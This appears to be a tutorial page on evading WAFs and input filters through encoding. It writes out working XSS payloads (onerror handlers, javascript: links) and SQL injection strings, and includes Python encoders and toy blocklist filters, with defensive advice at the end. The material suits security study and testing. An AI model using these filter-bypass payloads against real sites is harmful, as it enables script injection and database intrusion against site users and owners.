Note: For JavaScript obfuscation see [Javascript & Obfuscation]({{< ref "web/web-security/javascript and obfuscation/index" >}}).
**URL encoding.** Some WAFs fail to URL-decode the input before running their checks. Percent-encode the blocked keyword, so `SELECT` becomes `%53%45%4C%45%43%54`; a filter that matches on the raw string never sees the word.

**Double URL encoding.** A WAF that decodes the input exactly once can be beaten by encoding it twice: after its single decode it sees `%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E`, which matches no signature. If the back-end server decodes a second time (typically the framework decodes once and application code calls a URL-decode again), the payload arrives intact and is injected:

```
[...]/?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
```

**HTML encoding.** In certain HTML contexts, such as element text or attribute values, the browser automatically decodes character references while parsing. A server-side check for `alert(` misses the payload if some of its characters are HTML-encoded, e.g. `&#x61;lert(1)` inside an event-handler attribute:

```html
<img src=x onerror="&#x61;lert(1)">
```

When the browser renders the page it decodes the reference back to `alert(1)` and executes the injected handler. Note that this only works where the parser decodes entities; raw-text contexts such as the body of a `<script>` element are not decoded.
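The URL-encoding and double-URL-encoding passages above boil down to a mismatch in how many times each hop decodes. The following is an added example, not code from the original page: a toy WAF whose decode depth is a parameter, an encoder that wraps the payload one level deeper than the WAF looks, and the check a defender would add (a value that still contains `%XX` after one decode is being used to out-decode the filter). The `BLOCKED` signature list and the function names are assumptions made for this illustration.

```python
"""Added example (not from the original page): simulate the decode-depth
mismatch between a WAF and the back end. The blocklist and the toy WAF
are assumptions chosen to illustrate the technique."""
import re
from urllib.parse import quote, unquote

# Assumed signature list for the toy WAF (constructed for this example).
BLOCKED = ("select", "<img", "onerror=")


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte, e.g. SELECT -> %53%45%4C%45%43%54."""
    return "".join(f"%{b:02X}" for b in s.encode())


def double_url_encode(s: str) -> str:
    """Encode twice: the '%' from the first pass becomes '%25' in the second."""
    return quote(quote(s, safe=""), safe="")


def decode_n(raw: str, passes: int) -> str:
    """Apply `passes` rounds of URL decoding (0 = inspect the raw string)."""
    for _ in range(passes):
        raw = unquote(raw)
    return raw


def waf_blocks(raw_query: str, waf_passes: int) -> bool:
    """Toy WAF: decode `waf_passes` times, then substring-match the blocklist."""
    seen = decode_n(raw_query, waf_passes).lower()
    return any(sig in seen for sig in BLOCKED)


def still_percent_encoded(raw_query: str) -> bool:
    """Defensive check: after one decode, is a %XX sequence still present?
    A careful filter treats that as an attempt to out-decode it and either
    rejects the request or keeps decoding until the value stops changing."""
    return re.search(r"%[0-9A-Fa-f]{2}", unquote(raw_query)) is not None


def bypass_report(payload: str, waf_passes: int, backend_passes: int) -> dict:
    """Encode `payload` one level deeper than the WAF decodes, then report
    what the WAF and the back end each end up looking at."""
    sent = payload
    for _ in range(waf_passes + 1):
        sent = quote(sent, safe="")
    return {
        "sent": sent,
        "waf_blocked": waf_blocks(sent, waf_passes),
        "backend_sees": decode_n(sent, backend_passes),
        "injected": decode_n(sent, backend_passes) == payload,
    }


if __name__ == "__main__":
    print("single-encoded keyword:", percent_encode_all("SELECT"))
    for waf, backend in ((0, 1), (1, 2)):
        print(bypass_report("<img src=x onerror=alert(1)>", waf, backend))
```

`bypass_report("<img src=x onerror=alert(1)>", 1, 2)` reproduces the page's `%253Cimg%2520src...` case: the WAF's single decode yields a string with no `<img` or `onerror=` in it, while the back end's second decode restores the tag. The defensive side is `still_percent_encoded`: a WAF that decodes once and then refuses anything that still looks encoded (or decodes to a fixed point) closes both the single- and double-encoding gaps.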
**Leading zeros.** Numeric character references tolerate any number of leading zeros, which defeats filters that look for the exact strings `&#58;` or `&#x3a;`. HTML-encode `:` as `&#58;` (= `&#x3a;`), or with padding, e.g. `&#0000000000058;`:

```html
<a href="javascript&#0000000000058;alert(1)">Click me</a>
```

The browser decodes the padded reference to `:` and the link becomes `javascript:alert(1)`, while a check for the literal `javascript:` scheme in the server-side input never matches.

**XML encoding.** XML supports character encoding with the same numeric escape sequences as HTML, so a keyword inside an XML request body can be hidden from a filter that only inspects the raw text (the XML parser decodes `&#x53;` to `S` before the value reaches the query):

```xml
<stockCheck>
  <productId>123</productId>
  <storeId>999 &#x53;ELECT * FROM information_schema.tables</storeId>
</stockCheck>
```

**Multiple encodings.** Layers can be stacked, each one removed by a different stage. Here the HTML parser decodes the entity first, then the JavaScript engine decodes the Unicode escape:

```html
<a href="javascript:&bsol;u0061lert(1)">Click me</a>
```

1. (HTML) `&bsol;` -> `\`, giving `<a href="javascript:\u0061lert(1)">Click me</a>`
2. (Unicode) `\u0061` -> `a`, giving `<a href="javascript:alert(1)">Click me</a>`

**SQL CHAR() encoding.** `CHAR(83)` = `CHAR(0x53)` = `S`. If `SELECT` is blacklisted, build it from character codes and concatenate:

```sql
CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)
```

The `+` concatenation is Transact-SQL syntax; MySQL accepts `CHAR(83,69,76,69,67,84)` or `CONCAT(...)` instead. The expression evaluates to a string, not a keyword, so it only becomes a working `SELECT` where the application or a stored procedure concatenates the value into a query that is then executed dynamically.
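The HTML-entity, leading-zero, XML, stacked-encoding and CHAR() tricks above all rely on the consuming layer decoding something the filter did not. The following is an added example, not code from the original page: small encoders that rebuild each payload, minimal decoders standing in for the HTML parser, the JavaScript engine, the XML parser and the database, and two assumed naive filters (a raw `alert(`/`select` substring check and a raw `javascript:` scheme check) so the round trip can be verified. Function names, the filters and the zero-padding width are assumptions made for this illustration.

```python
"""Added example (not from the original page): encoders for the HTML, XML,
JavaScript and SQL CHAR() tricks, plus minimal decoders that mimic the
consuming layers. The naive filters are assumptions used to show what
a raw substring check misses."""
import html
import re


def html_numeric_entity(ch: str, hex_form: bool = False, pad: int = 0) -> str:
    """Numeric character reference for one char; `pad` prepends leading zeros,
    which parsers accept but exact-string filters do not expect."""
    digits = f"{ord(ch):X}" if hex_form else str(ord(ch))
    prefix = "&#x" if hex_form else "&#"
    return f"{prefix}{'0' * pad}{digits};"


def entity_encode(s: str, chars: str, **kw) -> str:
    """Entity-encode only the characters listed in `chars` (HTML and XML
    share this numeric reference syntax)."""
    return "".join(html_numeric_entity(c, **kw) if c in chars else c for c in s)


def js_unicode_escape(s: str, chars: str) -> str:
    """JavaScript \\uXXXX escapes for the listed characters: alert -> \\u0061lert."""
    return "".join(f"\\u{ord(c):04x}" if c in chars else c for c in s)


def sql_char_chain(word: str) -> str:
    """SELECT -> CHAR(83)+CHAR(69)+... ('+' concatenation is T-SQL style;
    MySQL would take CHAR(83,69,...) instead)."""
    return "+".join(f"CHAR({ord(c)})" for c in word)


# --- decoders standing in for the consuming layers ------------------------

def js_unescape(s: str) -> str:
    """Resolve \\uXXXX escapes the way the JavaScript engine would."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)


def browser_attribute_value(attr: str) -> str:
    """The HTML parser resolves entities (leading zeros included) first; the
    JS engine then resolves escapes inside the javascript: URL body."""
    return js_unescape(html.unescape(attr))


def xml_text_value(text: str) -> str:
    """XML numeric character references use the same syntax as HTML's, so
    html.unescape is an adequate stand-in for the XML parser here."""
    return html.unescape(text)


def sql_char_eval(expr: str) -> str:
    """Resolve a CHAR(n)+CHAR(n) chain to the string the database builds."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


def naive_filter_hits(s: str) -> bool:
    """Assumed server-side blocklist: raw substring match, no decoding."""
    return re.search(r"alert\(|select", s, re.IGNORECASE) is not None


def scheme_filter_hits(s: str) -> bool:
    """Assumed raw check for the javascript: URL scheme."""
    return "javascript:" in s.lower()


# --- the page's payloads rebuilt from the encoders -------------------------

def leading_zero_href() -> str:
    """javascript&#00000000000058;alert(1): the colon hides the scheme."""
    return "javascript" + html_numeric_entity(":", pad=12) + "alert(1)"


def xml_store_id() -> str:
    """999 &#x53;ELECT * FROM information_schema.tables"""
    return "999 " + entity_encode("SELECT * FROM information_schema.tables", "S", hex_form=True)


def layered_href() -> str:
    """HTML layer on top of a JavaScript layer: a -> \\u0061, then \\ -> &bsol;."""
    js_layer = js_unicode_escape("alert(1)", "a")      # \u0061lert(1)
    html_layer = js_layer.replace("\\", "&bsol;")       # &bsol;u0061lert(1)
    return "javascript:" + html_layer


if __name__ == "__main__":
    for p in (leading_zero_href(), layered_href()):
        print(p, "->", browser_attribute_value(p))
    print(xml_store_id(), "->", xml_text_value(xml_store_id()))
    print(sql_char_chain("SELECT"), "->", sql_char_eval(sql_char_chain("SELECT")))
```

Running it shows each payload failing the raw-substring filters and decoding to `javascript:alert(1)`, `999 SELECT * FROM information_schema.tables` or `SELECT` once the appropriate layer has processed it. The practical consequence for the defender is that any check has to run on the value as the final consumer will see it, i.e. after entity decoding, escape resolution and, for SQL, in the query the database actually executes, rather than on the bytes as received.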